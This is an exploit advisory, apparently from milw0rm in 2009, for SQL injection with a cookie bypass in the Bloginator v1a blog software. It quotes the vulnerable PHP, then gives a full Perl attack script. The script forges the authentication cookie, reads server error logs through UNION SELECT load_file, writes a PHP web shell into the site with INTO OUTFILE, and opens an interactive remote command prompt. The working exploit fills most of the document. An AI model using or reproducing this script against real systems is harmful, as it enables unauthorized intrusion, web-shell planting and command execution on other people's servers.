Bloginator v1a SQL Command Injection via Cookie Bypass Exploit########################################################################## Author = FireShot , Jacopo Vuga. Thx to = Osirys for develop the Exploitation Code with me Mail = fireshotautisticiorg / osirysautisticiorg Vulnerability = SQL Command Injection (mq = off) Software = Bloginator V1A Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0 Greets to = Myral, str0ke ########################################################################### [CODE] [URL] www.site.com/bloginator/articleCall.php global $name,$password,$returnLink; $p_name = strip_tags(substr($_POST['name'],0,32)); $p_password = strip_tags(substr($_POST['password'],0,32)); if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password ) { setcookie(`identifyYourself`,`you are identified`); print `Login successfull
`; print $returnLink; } else {print `Wrong username or password`; } } [...] $action = @$_GET['action']; [...] $id = $_GET['id']; [...] function editArticle($id,$message) { global $returnLink; $query = `select * FROM articles WHERE id='$id'`; $sql = mysql_query($query) or die(mysql_query()); $title = mysql_result($sql,0,'title'); $title = htmlentities($title); $article = mysql_result($sql,0,'article'); $article = htmlentities($article); $link = mysql_result($sql,0,'link'); $link = htmlentities($link); startHTML(`Edit ID # `.$id); ?> [/CODE] [EXPLOIT] #!/usr/bin/perl use IO::Socket; use LWP::UserAgent; my $host = $ARGV[0]; my $rand = int(rand 9) +1; my @error_logs = qw( /var/log/httpd/error.log /var/log/httpd/error_log /var/log/apache/error.log /var/log/apache/error_log /var/log/apache2/error.log /var/log/apache2/error_log /logs/error.log /var/log/apache/error_log /var/log/apache/error.log /usr/local/apache/logs/error_log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/www/logs/error_log /var/www/logs/error.log /usr/local/apache/logs/error.log /var/log/error_log /apache/logs/error.log ); my $php_c0de = ``; ($host) || help(`-1`); cheek($host) == 1 || help(`-2`); &banner; $datas = get_input($host); $datas =~ /(.*) (.*)/; ($h0st,$path) = ($1,$2); print `[*] Generating error through GET request ..\n`; get_req($host.`/osirys_log_test`.$rand); print `[*] Cheeking Apache Error Log path ..\n`; while (($log = <@error_logs>)&&($gotcha != 1)) { my $regexp = `File does not exist: (.+)\/osirys_log_test$rand`; my $sql_load_file = `/articleCall.php?action=edit&id=osirys' union select 1,2,3,4,load_file('`.$log.`'),6,7 order by '*`; $re = sql_socket($sql_load_file,$regexp,`1`); if ($re !~ /Failed/) { $site_path = $re; $ok = 1; } if ($ok == 1) { print `[*] Error Log path found -> $log\n`; print `[*] Website path found -> $site_path\n`; &inj_shell; } else { print `[-] Couldn't file error_log !\n`; } } sub inj_shell { my $attack = `/articleCall.php?action=edit&id=osirys' union select 1,2,3,4,'`.$php_c0de.`',6,7 into outfile '`.$site_path.`/1337.php`; my $regexp = `st4rt`; my $re = sql_socket($attack,$regexp,`2`); if ($re == 1) { print `[*] Shell succesfully injected !\n`; print `[&] Hi my master, do your job now [!]\n\n`; $exec_path = $host.`/1337.php`; &exec_cmd; } else { print `[-] Shell not found \n[-] Exploit failed\n\n`; exit(0); } } sub exec_cmd { $h0st !~ /www\./ || $h0st =~ s/www\.//; print `shell[$h0st]\$> `; $cmd = ; $cmd !~ /exit/ || die `[-] Quitting ..\n`; my $exec_path_ = $exec_path.`?cmd=`.$cmd; my $re = get_req($exec_path_); my $content = tag($re); if ($content =~ /st4rt(.+)\*\*6/) { my $out = $1; $out =~ s/\$/ /g; $out =~ s/\*/\n/g; chomp($out); print `$out\n`; &exec_cmd; } else { $c++; $cmd =~ s/\n//; print `bash: `.$cmd.`: command not found\n`; $c < 3 || die `[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n`; &exec_cmd; } } sub sql_socket() { my($sql,$regexp,$way) = @_; $sql = tag_encode($sql); my $url = $path.`/`.$sql; my $data = `GET `.$url.` HTTP/1.1\r\n`. `Host: `.$h0st.`\r\n`. `Keep-Alive: 300\r\n`. `Connection: keep-alive\r\n`. `Content-Type: application/x-www-form-urlencoded\r\n`. `Cookie: identifyYourself=you+are+identified;\r\n`. `Content-Length: 0\r\n\r\n`. `\r\n`; my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die `[-] Can't connect to $h0st:80\n[?] $! \n\n`; $socket->send($data); if ($way == 1) { while ((my $e = <$socket>)&&($stop != 1)) { if ($e =~ /$regexp/) { $gotcha = $1; $stop = 1; } } } elsif ($way == 2) { my $re = get_req($host.`/1337.php`); if ($re =~ /st4rt/) { $gotcha = 1; $stop = 1; } else { $gotcha = 0; $stop = 0; } } if ($stop == 1) { return($gotcha); } else { return(`Failed`); } } sub get_req() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; } sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } } sub get_input() { my $host = $_[0]; $host =~ /http:\/\/(.*)/; $s_host = $1; $s_host =~ /([a-z.-]{1,30})\/(.*)/; ($h0st,$path) = ($1,$2); $path =~ s/(.*)/\/$1/; $full_det = $h0st.` `.$path; return $full_det; } sub tag() { my $string = $_[0]; $string =~ s/ /\$/g; $string =~ s/\s/\*/g; return($string); } sub tag_encode() { my $sql = $_[0]; $sql =~ s/ /\%20/g; $sql =~ s//\%3E/g; $sql =~ s/`/\%22/g; return($sql); } sub banner { print `\n`. ` ---------------------------\n`. ` SQL Command Injection \n`. ` via Cookie Bypass \n`. ` Bloginator V1A \n`. ` by FireShot & Osirys \n`. ` ---------------------------\n\n`; } sub help() { my $error = $_[0]; if ($error == -1) { &banner; print `\n[-] Input data failed ! \n`; } elsif ($error == -2) { &banner; print `\n[-] Bad hostname address !\n`; } print `[*] Usage : perl $0 http://hostname/cms_path\n\n`; exit(0); } [/EXPLOIT] ############################################################################ # milw0rm.com [2009-03-19]